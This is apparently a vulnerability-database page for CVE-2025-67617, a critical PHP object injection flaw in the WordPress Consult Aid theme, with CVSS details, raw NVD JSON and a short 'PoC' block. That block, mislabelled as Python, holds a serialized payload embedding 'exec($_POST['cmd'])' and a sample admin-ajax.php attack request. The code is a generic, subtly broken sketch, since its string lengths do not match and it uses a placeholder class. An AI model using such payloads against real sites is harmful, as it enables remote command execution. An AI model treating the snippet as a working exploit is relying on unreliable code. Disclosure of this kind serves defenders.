Security Vulnerability Report
中文
CVE-2025-67617 CVSS 9.8 CRITICAL

CVE-2025-67617

Published: 2026-01-22 17:16:02
Last Modified: 2026-04-15 00:35:42

Description

Deserialization of Untrusted Data vulnerability in themeton Consult Aid consultaid allows Object Injection.This issue affects Consult Aid: from n/a through <= 1.4.3.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Consult Aid主题 <= 1.4.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php // CVE-2025-67617 PHP Object Injection PoC // Target: WordPress Consult Aid Theme <= 1.4.3 // Vulnerability: Deserialization of Untrusted Data // Example malicious serialized object $malicious_payload = 'O:14:"CustomClass":1:{s:5:"value";s:10:";echo exec($_POST['cmd']);//";}'; // For actual exploitation, attacker would need to: // 1. Identify the vulnerable deserialization endpoint // 2. Find a suitable POP chain in the theme or associated plugins // 3. Craft payload to trigger __destruct() or __wakeup() methods // 4. Send the payload via POST/GET parameter that gets unserialized // Example attack vector: // POST /wp-admin/admin-ajax.php HTTP/1.1 // Content-Type: application/x-www-form-urlencoded // // action=consultaid_action&data=O:14:"CustomClass":1:{s:5:"value";...} echo "Malicious Payload: " . $malicious_payload . "\n"; echo "This payload would be sent to the vulnerable endpoint for deserialization\n"; ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67617", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:01.967", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Deserialization of Untrusted Data vulnerability in themeton Consult Aid consultaid allows Object Injection.This issue affects Consult Aid: from n/a through <= 1.4.3."}, {"lang": "es", "value": "Vulnerabilidad de deserialización de datos no confiables en themeton Consult Aid consultaid permite la inyección de objetos. Este problema afecta a Consult Aid: desde n/a hasta &lt;= 1.4.3."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/consultaid/vulnerability/wordpress-consult-aid-theme-1-4-3-php-object-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}